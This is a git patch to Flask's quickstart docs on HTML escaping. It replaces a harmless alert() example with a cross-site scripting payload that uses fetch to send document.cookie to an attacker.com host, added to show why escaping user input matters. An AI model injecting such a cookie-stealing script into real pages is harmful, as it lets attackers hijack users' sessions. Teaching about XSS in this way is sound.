From 192e107ca9232626cbe319db1b492c313e56862b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ahmet=20G=C3=B6r?= <ahmetgr680@gmail.com>
Date: Tue, 17 Mar 2026 16:05:48 +0300
Subject: [PATCH] Added a real world html escaping example

---
 docs/quickstart.rst | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/docs/quickstart.rst b/docs/quickstart.rst
index 712ba977..52a239bd 100644
--- a/docs/quickstart.rst
+++ b/docs/quickstart.rst
@@ -147,8 +147,10 @@ how you're using untrusted data.
         name = request.args.get("name", "Flask")
         return f"Hello, {escape(name)}!"
 
-If a user submits ``/hello?name=<script>alert("bad")</script>``, escaping causes
-it to be rendered as text, rather than running the script in the user's browser.
+For example, if a web app displays user reviews without escaping input, an attacker could submit
+``<script>fetch('https://attacker.com?cookie=' + document.cookie);</script>``. 
+Now, any user viewing that page would unknowingly send their cookies to the attacker. 
+This is a classic Cross-Site Scripting (XSS) attack, preventable by escaping or encoding user input before rendering.
 
 
 Routing